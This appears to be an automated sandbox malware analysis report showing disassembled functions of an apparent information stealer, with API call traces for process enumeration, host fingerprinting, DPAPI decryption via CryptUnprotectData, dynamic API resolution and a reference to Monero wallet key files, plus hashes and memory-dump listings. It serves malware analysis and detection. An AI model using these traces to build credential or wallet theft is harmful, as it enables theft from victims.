Associated: 00000000.00000002.1932014519.0000000000B15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000D4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E2B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E51000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E69000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932724282.0000000000E6A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932873655.0000000001004000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932895785.0000000001005000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_970000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
String ID: \*.*
API String ID: 433455689-1173974218
Opcode ID: 405574913364080eace54547fe384172488a77bd89ddf144799a60b32d0edce8
Instruction ID: e99effd7fc3191afca9d046853b19f3a6e26ada750e12ac740b20b59e7951e30
Opcode Fuzzy Hash: 405574913364080eace54547fe384172488a77bd89ddf144799a60b32d0edce8
Instruction Fuzzy Hash: C31205719101149BEB18FB60DC96FED7379AFD4300F40459AB50AA6291EF386F49CFA2

Function 00989600 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0098961E
Process32First.KERNEL32(00990ACA,00000128), ref: 00989632
Process32Next.KERNEL32(00990ACA,00000128), ref: 00989647
StrCmpCA.SHLWAPI(?,00000000), ref: 0098965C
CloseHandle.KERNEL32(00990ACA), ref: 0098967A

Memory Dump Source

Source File: 00000000.00000002.1932014519.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true

Associated: 00000000.00000002.1932000779.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A7F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000D4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E2B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E51000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E69000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932724282.0000000000E6A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932873655.0000000001004000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932895785.0000000001005000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_970000_file.jbxd

Yara matches

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: a09e111b4299541682dd66c67bd664e901f8bb6b7d3b37539d19ea7516993b42
Instruction ID: 0febde6206573826460bac1c930919534a244d69884132cd2a60feb10289da54
Opcode Fuzzy Hash: a09e111b4299541682dd66c67bd664e901f8bb6b7d3b37539d19ea7516993b42
Instruction Fuzzy Hash: 88010C75A00208ABCB14DFA5DD58BEDB7F8EB48300F144288A906A7240EB749B40DF51

Function 00988680 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON

Download Yara Rule

APIs

Part of subcall function 0098A740: lstrcpy.KERNEL32(00990E17,00000000), ref: 0098A788

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,009905B7), ref: 009886CA
Process32First.KERNEL32(?,00000128), ref: 009886DE
Process32Next.KERNEL32(?,00000128), ref: 009886F3

Part of subcall function 0098A9B0: lstrlen.KERNEL32(?,00849138,?,\Monero\wallet.keys,00990E17), ref: 0098A9C5
Part of subcall function 0098A9B0: lstrcpy.KERNEL32(00000000), ref: 0098AA04
Part of subcall function 0098A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0098AA12

Part of subcall function 0098A8A0: lstrcpy.KERNEL32(?,00990E17), ref: 0098A905

CloseHandle.KERNEL32(?), ref: 00988761

Memory Dump Source

Source File: 00000000.00000002.1932014519.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true

Associated: 00000000.00000002.1932000779.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A7F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000D4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E2B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E51000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E69000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932724282.0000000000E6A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932873655.0000000001004000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932895785.0000000001005000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_970000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
String ID:
API String ID: 1066202413-0
Opcode ID: 6ffe0d439f7e278f2abbc023be2b99e8b43df51b824486ac085b471f0aa5e905
Instruction ID: c95db62b0af7837543b17808318a1556cdc972966fc663e40f0f01525a40f3d7
Opcode Fuzzy Hash: 6ffe0d439f7e278f2abbc023be2b99e8b43df51b824486ac085b471f0aa5e905
Instruction Fuzzy Hash: BF318271901218ABDB24EF55CC41FEEB778EF85700F50419AF109A22A0DF746E45CFA1

Function 00987A30 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0084E2C0,00000000,?,00990E10,00000000,?,00000000,00000000), ref: 00987A63
RtlAllocateHeap.NTDLL(00000000), ref: 00987A6A
GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0084E2C0,00000000,?,00990E10,00000000,?,00000000,00000000,?), ref: 00987A7D
wsprintfA.USER32 ref: 00987AB7

Memory Dump Source

Source File: 00000000.00000002.1932014519.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true

Associated: 00000000.00000002.1932000779.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A7F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000D4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E2B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E51000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E69000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932724282.0000000000E6A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932873655.0000000001004000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932895785.0000000001005000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_970000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateInformationProcessTimeZonewsprintf
String ID:
API String ID: 3317088062-0
Opcode ID: b8824e34dfa411ba901a5da425f88f3896afb8e40dc54ce5c4543b268e1555fd
Instruction ID: 2f0003c033d27b0ec66650618dea75a7652bb28ae9704712234d2f681fd3f36e
Opcode Fuzzy Hash: b8824e34dfa411ba901a5da425f88f3896afb8e40dc54ce5c4543b268e1555fd
Instruction Fuzzy Hash: 68118EB1D45218EBEB209B94DC49FA9B778FB44721F10479AE91A932C0DB745A40CF91

Function 00979B60 Relevance: 4.6, APIs: 3, Instructions: 51memoryencryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00979B84
LocalAlloc.KERNEL32(00000040,00000000), ref: 00979BA3
LocalFree.KERNEL32(?), ref: 00979BD3

Memory Dump Source

Source File: 00000000.00000002.1932014519.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true

Associated: 00000000.00000002.1932000779.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A7F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000D4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E2B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E51000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E69000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932724282.0000000000E6A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932873655.0000000001004000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932895785.0000000001005000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_970000_file.jbxd

Yara matches

Similarity

API ID: Local$AllocCryptDataFreeUnprotect
String ID:
API String ID: 2068576380-0
Opcode ID: 11ab2b8c78d0731f321e72955c09fb8fae773860b2beba17a66edf6fc39698c9
Instruction ID: 6e318e8e540e2aa056a5ab293d698fad8be1230c1aefb96853b411c99a564479
Opcode Fuzzy Hash: 11ab2b8c78d0731f321e72955c09fb8fae773860b2beba17a66edf6fc39698c9
Instruction Fuzzy Hash: 7411CCB5A00209EFDB04DF94D995AAE77B9FF89300F108558E915A7350D774AE10CF61

Function 009878E0 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 00987910
RtlAllocateHeap.NTDLL(00000000), ref: 00987917
GetComputerNameA.KERNEL32(?,00000104), ref: 0098792F

Memory Dump Source

Source File: 00000000.00000002.1932014519.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true

Associated: 00000000.00000002.1932000779.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A7F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000D4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E2B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E51000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E69000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932724282.0000000000E6A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932873655.0000000001004000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932895785.0000000001005000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_970000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateComputerNameProcess
String ID:
API String ID: 1664310425-0
Opcode ID: 47a347db0b1095eafe995124de0fe162cab2966eea9b75bd35657980682103c3
Instruction ID: 4cae2419413f6bca8eb9433a7c402cc78a5b983e538b614e67f444a352647955
Opcode Fuzzy Hash: 47a347db0b1095eafe995124de0fe162cab2966eea9b75bd35657980682103c3
Instruction Fuzzy Hash: 9A0162B1904204EBC710DF98DD45BAAFBB8F744B21F104219E545A3780D77559408BA1

Function 00987850 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,009711B7), ref: 00987880
RtlAllocateHeap.NTDLL(00000000), ref: 00987887
GetUserNameA.ADVAPI32(00000104,00000104), ref: 0098789F

Memory Dump Source

Source File: 00000000.00000002.1932014519.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true

Associated: 00000000.00000002.1932000779.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A7F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000D4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E2B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E51000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E69000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932724282.0000000000E6A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932873655.0000000001004000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932895785.0000000001005000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_970000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateNameProcessUser
String ID:
API String ID: 1296208442-0
Opcode ID: 75f85e50119f9de18ee2b92a5f5536a7892d29f6e7813cde3834d87004184b57
Instruction ID: 512f979e8bf5c6935969bf40ddc72cbe1066d739f8387efe8318c8ea39650978
Opcode Fuzzy Hash: 75f85e50119f9de18ee2b92a5f5536a7892d29f6e7813cde3834d87004184b57
Instruction Fuzzy Hash: C1F04FB1D44208ABC700DF99DD49FAEFBB8EB44711F10065AFA05A3780DBB859048BA1

Function 00971160 Relevance: 3.0, APIs: 2, Instructions: 15COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(?), ref: 0097116A
ExitProcess.KERNEL32 ref: 0097117E

Memory Dump Source

Source File: 00000000.00000002.1932014519.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true

Associated: 00000000.00000002.1932000779.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A7F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000D4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E2B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E51000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E69000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932724282.0000000000E6A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932873655.0000000001004000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932895785.0000000001005000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_970000_file.jbxd

Yara matches

Similarity

API ID: ExitInfoProcessSystem
String ID:
API String ID: 752954902-0
Opcode ID: 7d233ee72cbdae86655709c03fcd0308e39387d5c5c2807e8e22f59cf7fc95ef
Instruction ID: fbd5b1ac0e0dcf8fd265bf57cf1b2b8419dddcf4de4fc509744644d67a87f629
Opcode Fuzzy Hash: 7d233ee72cbdae86655709c03fcd0308e39387d5c5c2807e8e22f59cf7fc95ef
Instruction Fuzzy Hash: 9DD05E74D0830CDBCB00DFE1D8496DDBB78FB08321F000695D90563340EE716881CAA6

Function 00989C10 Relevance: 200.2, APIs: 112, Strings: 2, Instructions: 684
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(74DD0000,00835990), ref: 00989C2D
GetProcAddress.KERNEL32(74DD0000,00835A90), ref: 00989C45
GetProcAddress.KERNEL32(74DD0000,008496D0), ref: 00989C5E
GetProcAddress.KERNEL32(74DD0000,00849610), ref: 00989C76
GetProcAddress.KERNEL32(74DD0000,00849670), ref: 00989C8E
GetProcAddress.KERNEL32(74DD0000,00849640), ref: 00989CA7
GetProcAddress.KERNEL32(74DD0000,0083BBD0), ref: 00989CBF
GetProcAddress.KERNEL32(74DD0000,0084CF00), ref: 00989CD7
GetProcAddress.KERNEL32(74DD0000,0084CED0), ref: 00989CF0
GetProcAddress.KERNEL32(74DD0000,0084CF18), ref: 00989D08
GetProcAddress.KERNEL32(74DD0000,0084CF78), ref: 00989D20
GetProcAddress.KERNEL32(74DD0000,008356D0), ref: 00989D39
GetProcAddress.KERNEL32(74DD0000,008356F0), ref: 00989D51
GetProcAddress.KERNEL32(74DD0000,008357B0), ref: 00989D69
GetProcAddress.KERNEL32(74DD0000,008357D0), ref: 00989D82
GetProcAddress.KERNEL32(74DD0000,0084CEA0), ref: 00989D9A
GetProcAddress.KERNEL32(74DD0000,0084CFF0), ref: 00989DB2
GetProcAddress.KERNEL32(74DD0000,0083BCE8), ref: 00989DCB
GetProcAddress.KERNEL32(74DD0000,00835710), ref: 00989DE3
GetProcAddress.KERNEL32(74DD0000,0084CF30), ref: 00989DFB
GetProcAddress.KERNEL32(74DD0000,0084CE40), ref: 00989E14
GetProcAddress.KERNEL32(74DD0000,0084D038), ref: 00989E2C
GetProcAddress.KERNEL32(74DD0000,0084D098), ref: 00989E44
